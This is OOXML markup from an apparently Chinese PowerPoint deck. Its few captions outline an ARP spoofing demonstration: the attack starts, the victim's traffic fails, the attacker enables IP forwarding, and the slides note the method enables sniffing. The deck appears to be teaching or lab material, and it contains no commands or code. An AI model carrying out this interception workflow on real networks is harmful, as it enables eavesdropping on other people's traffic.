            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000"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61" name="矩形 60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6381750" y="2578735"/>
            <a:ext cx="3820795" cy="420370"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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arp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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欺骗成功</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1343660" y="2493645"/>
            <a:ext cx="4114165" cy="590550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1232535" y="3416300"/>
            <a:ext cx="4838065" cy="666750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6922770" y="3539490"/>
            <a:ext cx="3820795" cy="420370"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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受害者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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百度失败</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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7" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1327785" y="4230370"/>
            <a:ext cx="5594985" cy="688975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6922770" y="5625465"/>
            <a:ext cx="3820795" cy="749300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN"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受害者网络正常</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN"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endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN"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可利用该方法实现嗅探</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN"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10" name="图片 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3297555" y="427355"/>
            <a:ext cx="2880360" cy="1736090"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1343660" y="5135245"/>
            <a:ext cx="5038090" cy="1400175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="矩形 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7107555" y="4364990"/>
            <a:ext cx="3820795" cy="420370"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN"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攻击者开启</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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转发</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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13" name="矩形 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6922770" y="1085215"/>
            <a:ext cx="3820795" cy="420370"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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开始攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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9"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75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750"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="53"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="8" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="2750"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="61"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="750"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="61"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="11" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="275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750"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="14" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="275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750"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="17" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="275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750"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="20" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="275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61" grpId="0"/>
      <p:bldP spid="6" grpId="0"/>
      <p:bldP spid="8" grpId="0"/>
      <p:bldP spid="12" grpId="0"/>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59048" y="925965"/>
            <a:ext cx="4502332" cy="5183342"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="25000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="25000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp useBgFill="1">
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3607711" y="294873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smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst>
                <a:innerShdw blurRad="63500" dist="50800" dir="16200000">
                  <a:prstClr val="black">
                    <a:alpha val="30000"/>
                  </a:prstClr>
                </a:innerShdw>
              </a:effectLst>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4681006" y="3499305"/>
            <a:ext cx="5859994" cy="447675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>其他</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>……</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Freeform 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1335838">
            <a:off x="9471801" y="2622912"/>
            <a:ext cx="672608" cy="674134"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 250 w 744"/>
              <a:gd name="T1" fmla="*/ 0 h 745"/>
              <a:gd name="T2" fmla="*/ 220 w 744"/>
              <a:gd name="T3" fmla="*/ 6 h 745"/>
              <a:gd name="T4" fmla="*/ 125 w 744"/>
              <a:gd name="T5" fmla="*/ 126 h 745"/>
              <a:gd name="T6" fmla="*/ 5 w 744"/>
              <a:gd name="T7" fmla="*/ 221 h 745"/>
              <a:gd name="T8" fmla="*/ 0 w 744"/>
              <a:gd name="T9" fmla="*/ 249 h 745"/>
              <a:gd name="T10" fmla="*/ 23 w 744"/>
              <a:gd name="T11" fmla="*/ 372 h 745"/>
              <a:gd name="T12" fmla="*/ 23 w 744"/>
              <a:gd name="T13" fmla="*/ 372 h 745"/>
              <a:gd name="T14" fmla="*/ 23 w 744"/>
              <a:gd name="T15" fmla="*/ 372 h 745"/>
              <a:gd name="T16" fmla="*/ 0 w 744"/>
              <a:gd name="T17" fmla="*/ 494 h 745"/>
              <a:gd name="T18" fmla="*/ 5 w 744"/>
              <a:gd name="T19" fmla="*/ 524 h 745"/>
              <a:gd name="T20" fmla="*/ 125 w 744"/>
              <a:gd name="T21" fmla="*/ 619 h 745"/>
              <a:gd name="T22" fmla="*/ 220 w 744"/>
              <a:gd name="T23" fmla="*/ 739 h 745"/>
              <a:gd name="T24" fmla="*/ 249 w 744"/>
              <a:gd name="T25" fmla="*/ 744 h 745"/>
              <a:gd name="T26" fmla="*/ 310 w 744"/>
              <a:gd name="T27" fmla="*/ 733 h 745"/>
              <a:gd name="T28" fmla="*/ 372 w 744"/>
              <a:gd name="T29" fmla="*/ 721 h 745"/>
              <a:gd name="T30" fmla="*/ 372 w 744"/>
              <a:gd name="T31" fmla="*/ 721 h 745"/>
              <a:gd name="T32" fmla="*/ 494 w 744"/>
              <a:gd name="T33" fmla="*/ 745 h 745"/>
              <a:gd name="T34" fmla="*/ 524 w 744"/>
              <a:gd name="T35" fmla="*/ 739 h 745"/>
              <a:gd name="T36" fmla="*/ 619 w 744"/>
              <a:gd name="T37" fmla="*/ 619 h 745"/>
              <a:gd name="T38" fmla="*/ 739 w 744"/>
              <a:gd name="T39" fmla="*/ 524 h 745"/>
              <a:gd name="T40" fmla="*/ 744 w 744"/>
              <a:gd name="T41" fmla="*/ 496 h 745"/>
              <a:gd name="T42" fmla="*/ 721 w 744"/>
              <a:gd name="T43" fmla="*/ 372 h 745"/>
              <a:gd name="T44" fmla="*/ 721 w 744"/>
              <a:gd name="T45" fmla="*/ 372 h 745"/>
              <a:gd name="T46" fmla="*/ 721 w 744"/>
              <a:gd name="T47" fmla="*/ 372 h 745"/>
              <a:gd name="T48" fmla="*/ 744 w 744"/>
              <a:gd name="T49" fmla="*/ 251 h 745"/>
              <a:gd name="T50" fmla="*/ 739 w 744"/>
              <a:gd name="T51" fmla="*/ 221 h 745"/>
              <a:gd name="T52" fmla="*/ 619 w 744"/>
              <a:gd name="T53" fmla="*/ 126 h 745"/>
              <a:gd name="T54" fmla="*/ 524 w 744"/>
              <a:gd name="T55" fmla="*/ 6 h 745"/>
              <a:gd name="T56" fmla="*/ 495 w 744"/>
              <a:gd name="T57" fmla="*/ 0 h 745"/>
              <a:gd name="T58" fmla="*/ 433 w 744"/>
              <a:gd name="T59" fmla="*/ 12 h 745"/>
              <a:gd name="T60" fmla="*/ 372 w 744"/>
              <a:gd name="T61" fmla="*/ 24 h 745"/>
              <a:gd name="T62" fmla="*/ 372 w 744"/>
              <a:gd name="T63" fmla="*/ 24 h 745"/>
              <a:gd name="T64" fmla="*/ 250 w 744"/>
              <a:gd name="T65" fmla="*/ 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4" h="745">
                <a:moveTo>
                  <a:pt x="250" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="240" y="0"/>
                  <a:pt x="230" y="2"/>
                  <a:pt x="220" y="6"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="173" y="25"/>
                  <a:pt x="159" y="92"/>
                  <a:pt x="125" y="126"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="90" y="161"/>
                  <a:pt x="24" y="176"/>
                  <a:pt x="5" y="221"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1" y="230"/>
                  <a:pt x="0" y="239"/>
                  <a:pt x="0" y="249"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="289"/>
                  <a:pt x="23" y="333"/>
                  <a:pt x="23" y="372"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="23" y="372"/>
                  <a:pt x="23" y="372"/>
                  <a:pt x="23" y="372"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="23" y="372"/>
                  <a:pt x="23" y="372"/>
                  <a:pt x="23" y="372"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="23" y="410"/>
                  <a:pt x="0" y="454"/>
                  <a:pt x="0" y="494"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="505"/>
                  <a:pt x="1" y="515"/>
                  <a:pt x="5" y="524"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="25" y="571"/>
                  <a:pt x="91" y="586"/>
                  <a:pt x="125" y="619"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="160" y="654"/>
                  <a:pt x="175" y="721"/>
                  <a:pt x="220" y="739"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="229" y="743"/>
                  <a:pt x="239" y="744"/>
                  <a:pt x="249" y="744"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="268" y="744"/>
                  <a:pt x="289" y="739"/>
                  <a:pt x="310" y="733"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="331" y="727"/>
                  <a:pt x="352" y="721"/>
                  <a:pt x="372" y="721"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="372" y="721"/>
                  <a:pt x="372" y="721"/>
                  <a:pt x="372" y="721"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="410" y="721"/>
                  <a:pt x="454" y="745"/>
                  <a:pt x="494" y="745"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="504" y="745"/>
                  <a:pt x="514" y="743"/>
                  <a:pt x="524" y="739"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="571" y="720"/>
                  <a:pt x="585" y="653"/>
                  <a:pt x="619" y="619"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="653" y="584"/>
                  <a:pt x="720" y="569"/>
                  <a:pt x="739" y="524"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="742" y="515"/>
                  <a:pt x="744" y="506"/>
                  <a:pt x="744" y="496"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="744" y="456"/>
                  <a:pt x="721" y="412"/>
                  <a:pt x="721" y="372"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="721" y="372"/>
                  <a:pt x="721" y="372"/>
                  <a:pt x="721" y="372"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="721" y="372"/>
                  <a:pt x="721" y="372"/>
                  <a:pt x="721" y="372"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="721" y="335"/>
                  <a:pt x="744" y="291"/>
                  <a:pt x="744" y="251"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="744" y="240"/>
                  <a:pt x="743" y="230"/>
                  <a:pt x="739" y="221"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="719" y="174"/>
                  <a:pt x="652" y="159"/>
                  <a:pt x="619" y="126"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="584" y="91"/>
                  <a:pt x="569" y="24"/>
                  <a:pt x="524" y="6"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="515" y="2"/>
                  <a:pt x="505" y="0"/>
                  <a:pt x="495" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="475" y="0"/>
                  <a:pt x="454" y="6"/>
                  <a:pt x="433" y="12"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="413" y="18"/>
                  <a:pt x="392" y="24"/>
                  <a:pt x="372" y="24"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="372" y="24"/>
                  <a:pt x="372" y="24"/>
                  <a:pt x="372" y="24"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="334" y="24"/>
                  <a:pt x="290" y="0"/>
                  <a:pt x="250" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="50000">
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                  <a:alpha val="90000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="0">
                <a:schemeClr val="bg1">
                  <a:lumMod val="100000"/>
                  <a:alpha val="95000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="BFBFBF">
                  <a:alpha val="80000"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect t="100000" r="100000"/>
            </a:path>
            <a:tileRect l="-100000" b="-100000"/>
          </a:gradFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="571500" dist="508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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Freeform 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9507010" y="2658225"/>
            <a:ext cx="602190" cy="603506"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 753 w 772"/>
              <a:gd name="T1" fmla="*/ 235 h 773"/>
              <a:gd name="T2" fmla="*/ 735 w 772"/>
              <a:gd name="T3" fmla="*/ 386 h 773"/>
              <a:gd name="T4" fmla="*/ 753 w 772"/>
              <a:gd name="T5" fmla="*/ 538 h 773"/>
              <a:gd name="T6" fmla="*/ 633 w 772"/>
              <a:gd name="T7" fmla="*/ 633 h 773"/>
              <a:gd name="T8" fmla="*/ 538 w 772"/>
              <a:gd name="T9" fmla="*/ 753 h 773"/>
              <a:gd name="T10" fmla="*/ 386 w 772"/>
              <a:gd name="T11" fmla="*/ 735 h 773"/>
              <a:gd name="T12" fmla="*/ 324 w 772"/>
              <a:gd name="T13" fmla="*/ 747 h 773"/>
              <a:gd name="T14" fmla="*/ 234 w 772"/>
              <a:gd name="T15" fmla="*/ 753 h 773"/>
              <a:gd name="T16" fmla="*/ 139 w 772"/>
              <a:gd name="T17" fmla="*/ 633 h 773"/>
              <a:gd name="T18" fmla="*/ 19 w 772"/>
              <a:gd name="T19" fmla="*/ 538 h 773"/>
              <a:gd name="T20" fmla="*/ 37 w 772"/>
              <a:gd name="T21" fmla="*/ 386 h 773"/>
              <a:gd name="T22" fmla="*/ 19 w 772"/>
              <a:gd name="T23" fmla="*/ 235 h 773"/>
              <a:gd name="T24" fmla="*/ 139 w 772"/>
              <a:gd name="T25" fmla="*/ 140 h 773"/>
              <a:gd name="T26" fmla="*/ 234 w 772"/>
              <a:gd name="T27" fmla="*/ 20 h 773"/>
              <a:gd name="T28" fmla="*/ 386 w 772"/>
              <a:gd name="T29" fmla="*/ 38 h 773"/>
              <a:gd name="T30" fmla="*/ 447 w 772"/>
              <a:gd name="T31" fmla="*/ 26 h 773"/>
              <a:gd name="T32" fmla="*/ 538 w 772"/>
              <a:gd name="T33" fmla="*/ 20 h 773"/>
              <a:gd name="T34" fmla="*/ 633 w 772"/>
              <a:gd name="T35" fmla="*/ 140 h 773"/>
              <a:gd name="T36" fmla="*/ 753 w 772"/>
              <a:gd name="T37" fmla="*/ 235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2" h="773">
                <a:moveTo>
                  <a:pt x="753" y="235"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="772" y="281"/>
                  <a:pt x="735" y="339"/>
                  <a:pt x="735" y="386"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="735" y="436"/>
                  <a:pt x="771" y="493"/>
                  <a:pt x="753" y="538"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="734" y="583"/>
                  <a:pt x="667" y="598"/>
                  <a:pt x="633" y="633"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="599" y="667"/>
                  <a:pt x="585" y="734"/>
                  <a:pt x="538" y="753"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="491" y="773"/>
                  <a:pt x="434" y="735"/>
                  <a:pt x="386" y="735"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="366" y="735"/>
                  <a:pt x="345" y="741"/>
                  <a:pt x="324" y="747"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="293" y="756"/>
                  <a:pt x="261" y="764"/>
                  <a:pt x="234" y="753"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="189" y="735"/>
                  <a:pt x="174" y="668"/>
                  <a:pt x="139" y="633"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="105" y="600"/>
                  <a:pt x="39" y="585"/>
                  <a:pt x="19" y="538"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="492"/>
                  <a:pt x="37" y="434"/>
                  <a:pt x="37" y="386"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="37" y="337"/>
                  <a:pt x="1" y="279"/>
                  <a:pt x="19" y="235"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="38" y="190"/>
                  <a:pt x="104" y="175"/>
                  <a:pt x="139" y="140"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="173" y="106"/>
                  <a:pt x="187" y="39"/>
                  <a:pt x="234" y="20"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="281" y="0"/>
                  <a:pt x="338" y="38"/>
                  <a:pt x="386" y="38"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="406" y="38"/>
                  <a:pt x="427" y="32"/>
                  <a:pt x="447" y="26"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="479" y="17"/>
                  <a:pt x="511" y="9"/>
                  <a:pt x="538" y="20"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="583" y="38"/>
                  <a:pt x="598" y="105"/>
                  <a:pt x="633" y="140"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="666" y="173"/>
                  <a:pt x="733" y="188"/>
                  <a:pt x="753" y="235"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="50000">
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                  <a:alpha val="90000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="0">
                <a:schemeClr val="bg1">
                  <a:lumMod val="100000"/>
                  <a:alpha val="95000"/>
                </a:schemeClr>
              </a:gs>
